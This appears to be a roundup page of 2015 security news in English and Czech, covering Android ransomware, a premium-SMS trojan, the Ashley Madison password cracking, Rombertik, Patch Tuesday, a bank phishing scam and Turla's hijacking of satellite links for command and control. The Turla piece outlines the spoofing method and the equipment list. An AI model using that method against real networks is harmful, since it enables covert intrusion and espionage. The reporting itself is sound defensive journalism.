Apple plans to publicly release its latest iOS 9 software update for all supported devices on 16th September while the company has already made the Gold Master seed of the software available to developers.

Untethered Jailbreak for iOS 9

iH8sn0w has jailbroken his iPhone 5 running the iOS 9 GM seed.

The jailbreak is an untethered – a jailbreak where your devices don't require any reboot every time it connects to an external device capable of executing commands on the device.

You can watch the full jailbreak video below. The video demonstrates the iOS 9 jailbreak, including Verbose booting, code injection, custom boot logos, and Cydia.

iH8sn0w claimed that his method also works with the iOS 9.1 beta, though it is not shown in the video.

Both iOS 9 Gold Master (Build 13a340) and iOS 9.1 beta 1 (Build 13B5110e) versions can be downloaded from Apple's Developer Center.

iH8sn0w says he does not have any plans to release his Jailbreak software, but since the iOS 9 can be jailbroken, it is possible for other developers, like Pangu and TaiG team, to build and release an untethered iOS 9 jailbreak after the release.

Přicházejí první pravidelné bezpečnostní aktualizace Androidu

11.9.2015 Mobil
Google jako první plní příslib pravidelných bezpečnostních aktualizací Androidu -- majitelé Nexusů tak můžou začít stahovat. Samsung, LG a další výrobci snad budou brzy následovat.

Stagefright před nedávnem vystrašil uživatele Androidu jako jiná hrozba už dlouho ne. Díra v systémové Media Library umožnila útočníkům dostat do zařízení škodlivý kód pouhým odesláním MMS.

Naštěstí, efektivnější nástroje obrany v novějších verzích Androidu riziko hrozby zmírnily, Stagefright přesto ukázal, jak na tom systém s bezpečností je a přiměl jak samotný Google, tak vývojáře třetích stran dbát na to, aby uživatele zásobovali pravidelnými bezpečnostními aktualizacemi.

Google, Samsung a LG je v reakci na hrozbu Stagefrightu vydaly alespoň pro svá nejrozšířenější zařízení a přislíbily měsíční aktualizace i pro ty ostatní. To bylo před šestatřiceti dny.

Dnes Google vypustil první z těchto měsíčních dávek pro majitele Nexusů, konkrétně pro typy Nexus 4, 5, 6, 7, 9 a 10 tak je k dispozici Android 5.1.1 build s označením LMY48M a taky LMY48N pro televizní Nexus Player.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Vývojáři z Android Police k tomu přidali changelog, obsahující několik bezpečnostních úprav chyb, včetně té, která aplikacím umožnila obejít varovný SMS kód upozorňující uživatele před zpoplatněním určitých služeb.

Google tedy svým závazkům, zdá se, dostál, co ale ostatní? Dostat bezpečnostní aktualizace k uživatelům by mělo být zodpovědností každého výrobce, ideálně ve spolupráci s operátorem. Tím spíš, když každý model telefonu si žádá specifickou aktualizaci.

Alespoň u některých společností už se však věci daly do pohybu, když T-Mobile vydala aktualizace pro pět modelů Nexusů, pro Samsung Galaxy S6 i Note5 a brzy by měly následovat i ty pro LG G4.

Majitelé Nexusů vyráběných přímo pro Google, na nichž se Android navíc vyvíjí, můžou počítat s tím, že aktualizace – a tedy vyšší bezpečnost – budou mít k dispozici dřív. Jak moc dřív, se ještě uvidí. Stejně jako, kdy začnou reagovat i další výrobci jako jsou HTC, Motorola nebo Sony, respektive další operátoři Vodafone či O2.

Android ransomware masquerades as Adult Player app, takes photo of victim
A new mobile ransomware variant uses a clever new technique to push affected users to pay the asked-for ransom: it takes a photo of the user with the phone's front-facing camera, and inserts that photo in the ransom message.

The malware, posing as a porn app dubbed "Adult Player", lurks on third party app markets. When a user downloads and installs it (and gives it admin rights), the app shows a screen that says that an update is in progress.

What is really happening is that Adult Finder downloads another APK, which takes the picture of the user, collects information about the device, and sends it to one of its C&C servers whose domains are hard-coded in the app.

The server returns a personalized ransom message to the app, which then shows it to the user, while simultaneously locking the phone. There is no picture in this message because the researchers made sure the app couldn't take one while they were testing it out:

As you can see, the message contains some information about the device, its (and the user's) IP address, and tries to make the victim think that the FBI is somehow involved.

The victim is asked to pay a $500 ransom via PayPal in order for the device to be unblocked.

Fortunately, users can do so themselves, by booting their device into safe mode (the process is different for various devices), revoking the app's admin privileges (Settings > Security > Device Administrator > Select the app and deactivate it), and then uninstalling it (Settings > Apps > Uninstall the app).

“Ransomware and crypto malware, such as that imposed by pornographic app ‘Adult Player’, is rising at an alarming rate. Intel Security’s most recent Threats Report uncovered that ransomware shot up 127% in the past year alone, commented Raj Samani, CTO EMEA Intel Security.

In fact, Zscaler researchers have spotted additional apps belonging to this ransomware family and exhibiting similar functionality.

"We are increasingly seeing hackers blackmailing online users with their most private and sensitive information, or even photos," noted Samani. "Thanks to the pseudo-anonymity provided by digital currencies such as Bitcoin, hackers can simply buy the skills required to launch an attack online and accept ransom payment through the same technology. This makes ransomware and crypto malware a lucrative enterprise for online criminals – with successful attackers raking in tens of thousands worth of Bitcoin in matter of weeks.”

New Android malware could inflict $250,000 of losses
Bitdefender has uncovered CAPTCHA-bypassing Android malware, purposefully left in Google Play apps by unscrupulous developers, with the aim of subscribing thousands of users to premium-rate services.

If each victim is subscribed to at least one premium-rate number that charges a minimum $0.5 per SMS each month, the total financial losses from this Android-based malware could amount to $250,000.

The Trojan's sophistication lies in its ability to bypass CAPTCHA authentication systems by redirecting these requests to, an online image-to-text recognition service. relies on actual individuals to recognize CAPTCHA images, which makes it easy for requests to return to the malware in seconds because it mistakenly thinks there is human interaction. The malware then processes the covert subscription.

When conducting its own research, Bitdefender was already monitoring malware-like behavior and found that recent versions had stopped using the highly advanced packer - that eased its detection – but still used obfuscated strings.

“Among the Google Play apps that disseminate the trojan, two have between 100,000 and 500,000 installs each, which is a staggering potential victim count,” said Catalin Cosoi, Chief Security Strategist at Bitdefender. “Our research confirmed that these have been weaponised for a while, with one app going back by at least five iterations and has been regularly updated.”

“The malware has been built with covert capabilities to operate silently on the victim’s Android device,” Catalin Cosoi continued. “A mobile security solution is the only way to identify malicious apps, regardless of where they were downloaded, and stop threats from causing financial harm or personal data loss.”

Known as Android.Trojan.MKero.A, the malware was first spotted in late 2014, but was only distributed via third-party marketplaces or local popular social networks in Eastern Europe. Russia was one of the most affected countries.

At least one developer, Like Gaming, is publishing more than one of these malicious apps, which is the malware’s first occurrence in the official Google Play store. Developers have found new ways of packing it into seemingly legitimate apps that can bypass Google’s vetting system, Google Bouncer.

PIN-changing, screen-locking Android ransomware
A sophisticated new piece of ransomware targeting Android users and locking them out of their devices by changing the PIN has been discovered by ESET researchers.

Masquerading as an app for viewing adult videos called "Porn Droid", the LockerPin Trojan lurks on third party markets, warez forums and torrents. So far, the great majority of infected users are located in the US.

When users download and install the malicious app, the Trojan tricks them into giving it Device Administrator privileges by pretending it has to download and install an update/patch for the app.

"As the victims click through this innocuous-looking installation they also unknowingly activate the Device Administrator privileges in the hidden underlying window," the researchers explained.

The Trojan is now free to lock the device and reset the PIN for the lock screen. It then shows a message, supposedly by the FBI, which asks victims to pay a $500 fine in order to regain access to the device, and warns them against attempting to unlock the device themselves:

This Trojan also employs some very clever protections against it being detected and uninstalled.

"When users attempt to deactivate Device Admin for the malware, they will fail because the Trojan will have registered a call-back function to reactivate the privileges when removal is attempted," the researchers pointed out.

"Similarly to when Device Administrator is first activated by the Trojan, if a removal attempt is made the Device Administrator window is again overlaid with a bogus window. Pressing Continue effectively reactivates the elevated privileges."

Like many types of PC malware before it, LockerPin tries to stop mobile AV solutions from working.

According to the researchers, paying the ransom in this particular case will not get the victims anywhere, because after the reset, the new PIN is chosen at random, and the attackers do not know it.

"The only way to remove the PIN lock screen without a factory reset is when device is rooted or has a MDM solution capable of resetting the PIN installed. If the device is rooted then the user can connect to the device by ADB and remove the file where the PIN is stored. For this to work, the device needs to have debugging enabled otherwise it’s not possible (Settings -> Developer options -> USB Debugging)," they shared.

For instructions on how to do that, check out this blog post.

11 Million Ashley Madison Passwords Cracked In Just 10 Days


Last month, when hackers leaked nearly 100 gigabytes of sensitive data belonging to the popular online casual sex and marriage affair website 'Ashley Madison', there was at least one thing in favor of 37 Million cheaters that their Passwords were encrypted.

But, the never ending saga of Ashley Madison hack could now definitely hit the cheaters hard, because a group of crazy Password Cracking Group, which calls itself CynoSure Prime, has cracked more than 11 Million user passwords just in the past 10 days, not years.

Yes, the hashed passwords that were previously thought to be cryptographically protected using Bcrypt, have now been cracked successfully.

Bcrypt is a cryptographic algorithm that makes the hashing process so slow that it would literally take centuries to brute-force all of the Ashley Madison account passwords.

How do they Crack Passwords?

The Password cracking team identified a weakness after reviewing the leaked data, which included users' hashed passwords, executive e-mails and website source code.

During website's source code audit and analysis, the team found that some of the login session tokens used by the website were protected using MD5 (a weak and fast hashing algorithm).

So, instead of cracking the slow Bcrypt algorithm, they simply brute-forced the MD5 session tokens of respective accounts, which allowed the Password Cracking team to effectively obtain 11.2 Million passwords in plaintext format.

However, this approach doesn't allow to crack all 37 million Ashley Madison passwords, because the notoriously weak MD5 hashing algorithm was only introduced on June 2012.

Therefore, researchers estimated that nearly 15 million Ashley Madison accounts could be affected, out of which 11.4 Million are already cracked by the team’s password-cracking software.

Change Your Ashley Madison Password Now!

Researchers also claimed that they hope to crack the remaining 4 Million improperly secured account passwords within next 7-8 days.

Ashley Madison users are advised to change their account passwords if they haven't already changed them.

Moreover, the users need to follow some standard prevention practice, such as:
Do not use the same login credentials on other websites, like eBay or PayPal, as hackers could break into that account using the cracked password and the already dumped email addresses.
Use strong and different passwords on different sites.
Use a good and reputed "Password Manager" to manage all your passwords.
Further Related Reading:
Ashley Madison Hackers Released All the Stolen Data Online
Hackers Leak 20GB Data Dump, Including CEO's Emails
Ashley Madison Hacker – An Insider Woman Employee?
List of Top 10 Big Tech Companies where Ashley Madison is very Popular
Disgusting! Ashley Madison was Building an App – 'What's your Wife Worth?'
Lessons We Learned From Ashley Madison Data Breach

Security Sandboxes Challenged by Evolving Malware


Security sandboxes are a crucial tool in the battle against the constantly evolving efforts of malware writers. Suspicious files can be placed in a digital sandbox, in which security can watch, look, and listen to determine what the code does, whom it communicates with, and if it plays nice as expected. This helps determine if a file is benign or malicious. The sandbox itself is a façade, designed to look and feel like a vulnerable system, yet in reality it is an isolated laboratory that is reinforced to allow malicious files to execute but not cause any real damage. It is all under the control and watchful eye of the security tool set. After analysis is complete, the entire digital sandbox is deleted, with any potentially harmful activities and changes disappearing with it.
Many security vendors incorporate this technology to conduct analysis of downloads, executables, and even software updates to prosecute the malicious or allow good files to flow. Similar tools are employed by forensic experts to dissect malware and unravel the inner workings. The stratagem has proven worthwhile at confidently detecting dangerous code. So much so that malware writers began embedding features into their software to detect when they have been put in a sandbox. In order to remain elusive, upon detection the code either goes silent, temporarily acts innocently, or takes the preemptive measure of deleting itself, in hopes of avoiding being scrutinized by security researchers.
Security has responded by making sandboxes stealthier to avoiding detection and allow malware to show its true nature, in a safe environment. This hide-and-seek game has escalated, with new features being employed on both sides to remain undetected while attempting to discover their counterpart.
In most instances it is passive contest. That is, until Rombertik. Given the adversarial nature of the industry, nothing stays secure forever, even security tools. Rombertik takes a different approach and goes on the offensive to cause harm, incurring a discouraging cost on those employing security tools.


Our security colleagues at Cisco have done a great job highlighting the antisandbox advances of the Rombertik malware in the Cisco 2015 Midyear Security Report. They show how the creators of Rombertik have taken a divergent path from their more docile predecessors. Instead of being passive and self-deleting or remaining quiet, it lashes out at the very systems attempting to analyze it. Rombertik contains a number of mechanisms to undermine, overflow, and detect sandboxes. Once Rombertik believes it is under the microscope, it attacks. The malware attempts to overwrite the machine’s master boot record or destroy all files in the user’s home folder, with the goal of making the system inoperable after rebooting.
The Cisco report states “Rombertik may be a harbinger of what’s to come in the malware world, because malware authors are quick to adopt their colleagues’ successful tactics.” It is an insightful report and I strongly recommend reading it.
The idea of a safe area to test suspicious code is not new. The original sandbox was simply an extra PC that could be isolated and completely wiped after the analysis. But that was not a very scalable or terribly efficient practice. The revolution really came when software could create virtual sandboxes as needed. Such environments are quick to create, easy to configure, and simple to delete and start anew. Dozens or even hundreds could be created and be running simultaneously, each testing for malware. But software has some inherent security limitations. Malware can sometimes break out of “jail” and escape the protected sandbox to cause real harm. Plus, the most sophisticated attackers can actually turn the tables to get under the virtual environment—running the security environment in a sandbox managed by the attacker!
This maneuvering gets more complex over time as both sides escalate their tactics through innovation. How much longer can software-created sandboxes remain one step ahead? Nobody is sure.
What we need is a more robust means of building improved sandboxes. Beneath software resides the hardware, which has the advantage of being the lowest part of the stack. You cannot get “under” the hardware and it is much more difficult to compromise than operating systems, applications, and data, which run above. Hardware advances may revolutionize the game with better sandboxes that are more difficult to detect and undermine. I think time will tell, but the move to hardware seems to be where the battle is heading. What cannot be foretold is if changes in hardware will be the winning salvo or just a new battlefield for the attackers and defenders in the war of cybersecurity.

Valasek: Today’s Furby Bug is Tomorrow’s SCADA Vulnerability


CAMBRIDGE, Mass. – Chris Valasek and Charlie Miller’s car hacking research put a crunching reality on Internet of Things security, moving it beyond almost clichéd discussions of smart refrigerators leaking inconsequential data, to hackers remotely manipulating car brakes.

But Furby hacking matters too.

Valasek made it clear today during a keynote at the Security of Things forum here Thursday that the connectivity of things is a great unknown, and that today’s low-impact vulnerability in a processor, connector or CAN bus, is tomorrow’s high-impact issue inside a power plant or the brains of a Jeep Cherokee. His favorite example of some low-impact research involved work done by Azimuth Security’s Michael Coppola, a recent Northeastern University graduate, who reverse-engineered a Furby, a popular child’s toy from the 1990s. Coppola discovered vulnerabilities in the way the toy communicates with other Furby toys and its mobile app.

“We did high-impact car hacking research over a cell network that instituted a massive recall,” Valasek said. “But low-impact research cannot be dismissed either. Not every IOT vulnerability is going to be high impact. You have to judge how technology that might be vulnerable today will be used in the future.

“There are processors and communications channels everywhere, and purchasers buy these things in bulk,” Valasek said. “Something that does communications in a Furby may be in a SCADA system as well. Don’t dismiss small things that could have a high impact.”

Having since joined Uber’s Advanced Technology Center—along with Miller—Valasek’s talk was his first public appearance since the remote car hacking research dominated the summer. Valasek had stern reminders about the opportunity in front of researchers and manufacturers to secure devices by design and the need to implement processes to update things already in the field that have been connected, and are likely vulnerable.

But unlike software that can be updated monthly, or on-the-fly if need be, IOT devices have hardware dependencies that make patching challenging.

“There are a lot of complexities these companies have that regular software people don’t. Microsoft can refactor software and not care about the hardware it’s running on. The makers of things like cars cannot do that,” he said. Valasek and Miller were able to attack critical systems on the Jeeps they tested by finding connections via a CAN bus that talked to the entertainment system in the vehicle as well as steering, acceleration and braking systems. Fiat Chrysler America immediately issued a recall of 1.4 million vehicles to apply patches.

“They can’t just refactor,” Valasek said. “They have to replace hardware, which is impossible for a lot of large companies.”

The researcher urged that responsibility for security be shared by a number of parties, including parts manufacturers, OEMs and carriers in the case of the car-hacking research.

In the example of Valasek’s and Miller’s car hacking, the researchers found a vulnerability in a communications module called UConnect manufactured by Harman. Complicating matters was shoddy network segmentation by Sprint that allowed the researchers to use a burner phone purchased at Wal-Mart to act as a hotspot that enabled the remote attacks.

Sprint closed a number of open ports that did more to mitigate potential attacks than the Fiat Chrysler patch that closed a supposed air-gapped connection between CAN buses managing the vehicle’s respective entertainment and acceleration/braking systems, Valasek said. But the key is that the parties—minus Harman—were talking.

“These parties need to communicate and work to ensure networks used for their products are aware of each other,” Valasek said. “What we should do is put forth an effort to secure things when we design them, have design, implementation and remediation reviews. OTA (over-the-air) updates are a must. If something runs code, it will have to be fixed. Researchers have to keep researching.”

Nebezpečné trhliny mají Windows, Office, Edge i Explorer

10.9.2015 Zranitelnosti
Společnost Microsoft tento týden vydala pravidelný balík aktualizací, který vychází vždy druhý týden v měsíci. Tentokrát je však porce bezpečnostních záplat opravdu velká, je jich více než pět desítek. Některé z objevených chyb, pro něž byly opravy vydány, jsou přitom kritické.
„Společnost Microsoft vydala záplaty na více než 50 zranitelností týkajících se Windows a aplikací Internet Explorer, Edge, Office, Lync, Exchange Server, NET Framework, Exchange Server a Skype pro Business Server,“ varoval analytik Pavel Bašta z Národního bezpečnostního týmu CSIRT.

Například u Windows se zranitelnosti týkají prakticky všech aktuálně podporovaných verzí, tedy Vist, sedmiček, osmiček a také nejnovějších desítek. Některé z trhlin jsou navíc označované jako kritické.

Kybernetický nájezdník je tak může zneužít k tomu, aby na napadeném stroji spustil libovolný škodlivý kód. Na cizí počítač tak může propašovat klidně nezvaného návštěvníka, který bude odchytávat každý stisk kláves. Relativně snadno pak získá všechna přístupová hesla uživatele.

Stahovat všechny záplaty pro kritické trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.

Podvodníci lákají na hypotéky, pak lidi oškubou

10.9.2015 Hacking
S novou fintou přišli v posledních dnech internetoví podvodníci. Vydávají se za zaměstnance České spořitelny a nabízejí lidem výhodné hypotéky. Ve skutečnosti se však z nich snaží pouze vylákat potvrzovací SMS zprávu, kterou budou moci zneužít k vysátí klientova účtu. Před novým typem phishingového útoku varovala Česká spořitelna.
Podvodná stránka s nabídkou výhodné hypotéky

Podvodná stránka s nabídkou výhodné hypotéky
Hlavní problém je v tom, že kampaň na výhodnější hypotéky ve spořitelně skutečně běží. Klienti lačnící po novém bydlení se tak mohou nechat nízkou úrokovou sazbou 1,85 % ročně snadno nalákat.

„Podvodníci využili naší skutečné obchodní kampaně v internetovém bankovnictví SERVIS 24, která se týká hypoték. Toto obchodní sdělení zneužili s cílem vylákat potvrzovací SMS kód od klientů. Banka nikdy v obchodním sdělení nepožaduje po klientovi potvrzení SMS kódem,“ varovali zástupci České spořitelny.

Trik funguje na podobném principu jako drtivá většina phishingových útoků. Podvodníci nejprve propašují do počítače virus, který následně při snaze o přihlášení do internetového bankovnictví nabídne uživateli podvodnou stránku služby Servis 24 s onou neodolatelnou nabídkou.

Podvodná stránka s nabídkou výhodné hypotéky.

Podvodná stránka s nabídkou výhodné hypotéky.
Na konci stránky se pak uživatel dočte následující: „Pro pokračování práce s osobními údaji je třeba zadat SMS kód, který byl odeslán na Váš mobilní telefon. Tímto způsobem potvrzujete, že jste pravým majitelem účtu a že jsme Vás poučili o podmínkách konající akce.“

O žádné potvrzení samozřejmě podvodníkům nejde. Jediné, o co se snaží, je vylákat SMS zprávu z důvěřivců. Pak už jim totiž nestojí nic v cestě k financím uloženým na bankovním účtu.

Zatímco drtivá většina podobných phishingových podvodů je rozeznatelná na první pohled, tentokrát se podařilo počítačovým pirátům okopírovat internetové bankovnictví spořitelny dokonale. Stránka s nabídkou je navíc psána česky a bez větších pravopisných chyb.

Podvod odhalí jen pozorní uživatelé
Jediný způsob, jak mohou pozornější uživatelé podvod rozpoznat, je tak kontrola internetové adresy. Podle ní klient zjistí, že se vlastně vůbec na stránkách banky nenachází. Internetové bankovnictví České spořitelny využívá adresu, zatímco u podvodné stránky je v adresním řádku internetového prohlížeče uvedeno Adresu však mohou kyberzločinci časem měnit.

„Pokud máte podezření, že jste reagovali na podvodnou zprávu, ihned kontaktujte Klientskou linku České spořitelny na bezplatném telefonním čísle 800 207 207,“ konstatovali zástupci spořitelny.

Není samozřejmě vyloučeno, že s podobným trikem se budou podvodníci snažit napálit v dohledné době klienty další tuzemské banky. Uživatelé by se v takovém případě měli také neprodleně obrátit na svou banku.

Microsoft přichystal první zásadní patche pro Edge

10.9.2015 Zabezpečení
Nový prohlížeč Edge, jímž Microsoft vybavuje Windows 10, se během prvního záplatovacího úterku dočkal první várky bezpečnostních patchů. Celkem byly čtyři. Jeho předchůdce, poslední Explorer, jich potřeboval sedmnáct.

Microsoft představil Edge jako novou generaci prohlížečů pro Windows, která by měla časem zcela nahradit Internet Explorer. A je tak dobré dodat, že všechny kritické chyby, které aktuální patche záplatují, byly objeveny i v Exploreru, který už ale společnost zajistila v dřívějším opravném balíčku.

„Šlo o možnost napadení speciálně podvrženou webovou stránkou, ať už používáte Internet Explorer nebo Edge,“ shrnuje Wolfgang Kandek z bezpečností společnosti Qualys. Shodnost děr podle něj také vyjevuje, že vývojáři Microsoftu při tvorbě Edge alespoň do určité míry vycházeli z kódu Exploreru.

Že se však jejich snaha o vytvoření bezpečnějšího prohlížeče nemíjí účinkem, nabízí srovnání právě s Explorerem, který oproti čtyřem patchům pro Edge potřeboval záplat rovnou sedmnáct.

„A taky to ukazuje, jak obtížné je napsat software, který by byl zcela bezchybný a odolný vůči útokům,“dodává Kandek.

Další chyby, na něž Microsoft ve svém aktuálním oběžníku upozorňuje, se týkají mimo jiné populárních kancelářských produktů Office 2007 a 2010. V Qualys v poslední době zaznamenali sérii útoků, k jejichž spuštění stačí pouze otevření škodného Wordovského nebo Excelovského dokumentu, které následně můžou spouštět další akce, o nichž uživatel vůbec nemusí vědět.

Celkově Microsoft letos vydal zatím 105 bezpečnostních oběžníků, což je jen o jeden méně než za celý loňský rok a podle odhadů Qualysu se jejich počet na konci roku zastaví na čísle 145.

Podle Kandeka to však neznamená, že by se dnešní software stával náchylnějším k útokům. Spíš přibývá zdatných programátorů a útočníků schopných najít v programech mezeru, jimž hraje do karet i narůstající pestrost trhu, ať už se týká samotných programů nebo platforem, na kterých běží.

„Aktuální čísla ukazují, jak zásadní roli začíná bezpečnost mít,“ uzavírá Kandek.

Turla APT Group Abusing Satellite Internet Links


Poorly secured satellite-based Internet links are being abused by nation-state hackers, most notably by the Turla APT group, to hide command-and-control operations, researchers at Kaspersky Lab said today.

Active for close to a decade, Turla’s activities were exposed last year; the Russian-speaking gang has carried out espionage campaigns against more than 500 victims in 45 countries, most of those victims in critical areas such as government agencies, diplomatic and military targets, and others.

Its use of hijacked downstream-only links is a cheap ($1,000 a year to maintain) and simple means of moving malware and communicating with compromised machines, Kaspersky researchers wrote in a report. Those connections, albeit slow, are a beacon for hackers because links are not encrypted and ripe for abuse.


“Once an IP address that is routed through the satellite’s downstream link is identified, the attackers start listening for packets coming from the internet to this specific IP,” the researchers wrote. “When such a packet is identified, for instance a TCP/IP SYN packet, they identify the source and spoof a reply packet (e.g. SYN ACK) back to the source using a conventional Internet line.”

The victim, meanwhile, is none the wiser because the link ignores the packet because it’s going to an unconventional port.

“There is an important observation to make here,” the researchers wrote. “Normally, if a packet hits a closed port, a RST or FIN packet will be sent back to the source to indicate that there is nothing expecting the packet. However, for slow links, firewalls are recommended and used to simply DROP packets to closed ports. This creates an opportunity for abuse.”


Abuse of satellite links is not solely the domain of Turla. HackingTeam command and control servers, for example, were found to be using such links to mask operations, as were links traced to Rocket Kitten and Xumuxu, two APT groups that are government-backed or have governments as customers, Kaspersky said.

Kaspersky speculates that APT groups turn to satellite-based Internet links for C&C for a number of reasons, including as a countermeasure against botnet takedowns by law enforcement and ISPs, which open an avenue for researchers to determine who is behind an operation. Using these satellite links, however, is not without its risks to the attacker.

“On the one hand, it’s valuable because the true location and hardware of the C&C server cannot be easily determined or physically seized. Satellite-based Internet receivers can be located anywhere within the area covered by a satellite, and this is generally quite large,” the researchers wrote. “The method used by the Turla group to hijack the downstream links is highly anonymous and does not require a valid satellite Internet subscription. On the other hand, the disadvantage comes from the fact that satellite-based Internet is slow and can be unstable.”

Rather than buy expensive subscriptions to the satellite-based links or hack an ISP with a man-in-the-middle attack at the router level in order to hijack streams, Turla’s approach is much cheaper and keeps the attackers anonymous, Kaspersky said. They instead hijack satellite DVB-S links—similar research was presented at Black Hat in 2010—that requires minimal equipment including a satellite dish, a low-noise block downconverter, a dedicated DVB-S tuner on a PCIe card made by TBS Technologies, and a Linux PC.

“The TBS card is particularly well-suited to this task because it has dedicated Linux kernel drivers and supports a function known as a brute-force scan which allows wide-frequency ranges to be tested for interesting signals,” the researchers wrote. “Of course, other PCI or PCIe cards might work as well, while, in general the USB-based cards are relatively poor and should be avoided.”


The group behind Turla has been abusing DVB-S (digital video broadcasting-satellite) Internet providers in the Middle East and Africa, locations where their satellite beams do not cover Europe or Asia, steering them clear of many security researchers. Kaspersky published a long list of command and control servers resolving to satellite-based ISPs in its report, calling out one in particular falling into the range of Germany’s IABG mbH. The IP address is encrypted in the C&C server, which is a Turla backdoor called Agent.DNE compiled in 2007.

“Of course, for logistical reasons it is more straightforward to rely on bullet-proof hosting, multiple proxy levels or hacked websites, but this method provides an unmatched level of anonymity,” the researchers wrote. “In truth, the Turla group has been known to use all these other techniques as well, making it for a very versatile, dynamic and flexible cyber-espionage operations.”

Last August, researchers at Kaspersky exposed many of Turla’s traditional hacking activities, including the use of watering hole attacks and spear phishing to initially compromise victims with the Snake or Uroburos backdoor. The Epic Turla campaign also used at least two zero-day exploits at the time, giving the hackers privilege escalation on Windows machines and code execution via an Adobe Reader vulnerability. There were also exploits against a number of patched vulnerabilities.

Microsoft Releases 12 Security Updates (5 Critical and 7 Important Patches)


With the release of 12 Security Bulletins, Microsoft addresses a total of 56 vulnerabilities in its different products. The bulletins include five critical updates, out of which two address vulnerabilities in all versions of Windows.

The September Patch Tuesday update (released on second Tuesday of each month) makes a total of 105 Security Bulletins being released this year; which is more than the previous year with still three months remaining for the current year to end.

The reason for the increase in the total number of security bulletins within such less time might be because of Windows 10 release and its installation reaching to a score of 100 million.

Starting from MS15-094 to MS15-105 (12 security bulletins) Microsoft rates the severity of the vulnerabilities and their impact on the affected software.

Bulletins MS15-094 and MS15-095 are the cumulative updates, meaning these are product-specific fixes for security related vulnerabilities that are rated as 'critical' by Microsoft.

Bulletins MS15-097 to MS15-099 are also rated as the most critical vulnerabilities with the impact leading to remote code execution (RCE) of the affected software.


1. Cumulative Security Update for Internet Explorer (MS15-094) was present in Internet Explorer 7 through Internet Explorer 11 and was rated 'Critical' on Windows clients and 'Moderate' on Windows servers.

The vulnerability could allow an attacker to gain administrative user rights of the victim when the user visits a specially crafted web page set up by the attacker.

The security update addresses the flaws by:
Modifying how Internet Explorer (IE) handles objects in memory
Modifying how IE, JScript, and VBScript handle objects in memory
Helping to ensure that IE correctly permits file operations
2. Cumulative Security Update for Microsoft Edge (MS15-095) is for the Microsoft's Edge browser of the newly released Windows 10 where the severity rating is critical for all the Windows 10 clients.

The vulnerability was exactly the same as MS15-094 but was present in both Windows Edge and Internet Explorer. The update addresses the flaws by modifying how Microsoft Edge handles objects in memory.

3. RCE Vulnerabilities in Microsoft Graphics Component (MS15-097) allows an attacker to implement remote code execution when the victim accesses specially crafted document or visits an untrusted web page that contains Embedded OpenType fonts (.eot).

This security update is rated 'Critical' for:
All supported versions of Windows Vista and Windows Server 2008
All affected versions of Microsoft Lync 2013, Microsoft Lync 2010, and Microsoft Live Meeting 2007
All affected versions of Microsoft Office 2007 and Microsoft Office 2010
The vulnerability was resolved by how:
Windows Adobe Type Manager Library handles OpenType fonts
Windows kernel-mode driver handles objects in memory
Windows validates integrity levels to prevent inappropriate process initialization
Windows kernel handles memory addresses
4. RCE Vulnerabilities in Windows Journal (MS15-098) lets an attacker remotely execute malicious code if a user opens a specially crafted Journal file.

This security update is rated Critical for all supported releases of Windows operating system and addresses the issues by modifying how Windows Journal parses Journal files.

5. RCE Vulnerabilities in Microsoft Office (MS15-099) allows an attacker to exploit the vulnerability present in the Microsoft's Office Suite by gaining access to the victim (user having administrative rights) and running arbitrary code in the name of an authorized user.

Though users with limited rights are supposedly safe, and the affected software include:
All versions of Microsoft Office 2007
All versions of Microsoft Office 2010
All versions of Microsoft Office 2013
All versions of Microsoft Office 2013 RT
The security update addresses the flaws by correcting how Microsoft Office handles files in memory and by modifying how SharePoint validates web requests.


The Other remaining vulnerabilities MS15-096 and from MS15-100 to MS15-105 are rated as 'Important' on Microsoft's severity scale; those are affecting:
Microsoft Windows various versions
Lync messenger
Microsoft Exchange Server
Microsoft .NET name a few
The vulnerabilities could allow hackers to conduct attacks such as:
Denial of Service
Privilege escalation
Information breach
Other security breaks
Microsoft has acknowledged researchers at Google Project Zero, hyp3rlinx, FireEye Inc., Fortinet's FortiGuard Labs, Cisco Talos...and many more as the contributors for helping them providing adequate security to the users.

For the updates, you will have to follow the same method of downloading and installing the Windows update for your system.

TIP for Windows users: Keep your system's Windows Update settings to "Check for Updates but let me choose whether to download and install them."

Techie Police Officer Builds a Sniffing Tool to Track Stolen Devices (based on War-Driving)


Ever wonder, How can you Track your Stolen Smartphone, Laptop or any Smart Device?

...With IMEI Number?

...Or IP address?

...Or may be some special types of equipment?

Well, Not required, because now it is possible to track stolen devices just by scanning their MAC addresses.

Yes, Just MAC addresses, which is assigned to each device on a unique basis by the IEEE, but crooks can modify it in an attempt to hide the origin of the stolen device.

But given the people's practice to never notice the MAC address of their mobile phone, tablet, laptop, desktop, smart TV, smart refrigerator, or broadband router, MAC addresses can be used to track stolen electronics.

This exactly is what an Iowa City cop wants to do.

How Police Can Track Stolen Devices?

According to Gazette, an Iowa police officer David Schwindt has developed a sniffing software that helps police find more stolen properties.

The software, Schwindt dubbed L8NT (short for Latent analysis of 802.11 Network Traffic), is a specialized wireless dongle with a suitable antenna that scans for and locates MAC addresses associated with the known stolen devices.

The MAC addresses of the stolen devices can be stored in the L8NT database. Depending on the situation, MAC addresses are easily identifiable.

How does 'L8NT' Work?

When L8NT is running, the software is channel hopping through the 2.4 GHz and/or 5 GHz bands and receiving packets.

The source and destination MAC addresses are stripped out of the MAC address header of each packet and compared to the known stolen MAC addresses in the database.

If the particular MAC address is not in the L8NT database, it is ignored. But if there is a match, the L8NT user is notified.

By switching to a directional antenna, and using the signal strength meter in L8NT, the user can follow the signal back to the physical device.

However, the stolen devices should have wireless networking capability (Wi-Fi) turned on. If the device Wi-Fi is turned off or is powered down, the device is not going to be visible.

Intelligence Agencies Used Similiar Technology to Spy

Leaked NSA documents last year revealed that…

Under the "Passengers tracking operation", the Canadian spy agency was tracking passengers even days after they left the airport terminal just by capturing their device MAC addresses from the free Wi-Fi service at a major Canadian airport.

The documents also revealed that the federal intelligence agency was collecting MAC addresses in the United States Airports as well, and literally at other thousands of public places in the U.S.

Laws and L8NT

The traditional method used by law enforcement for recovering lost or stolen devices is to physically examine the device to obtain the model and serial number.
"However, physical examination of most devices is extremely difficult because of Constitutional search and seizure issues," L8NT website reads. "In most cases, law enforcement is only able to create a report of the theft for insurance purposes."
Schwindt promises that L8NT does not record any personal or sensitive information from the device, while it only scans for contraband MAC addresses.

The officer has developed a proof-of-concept software, but hopes to patent L8NT and will apply for a full patent this fall.

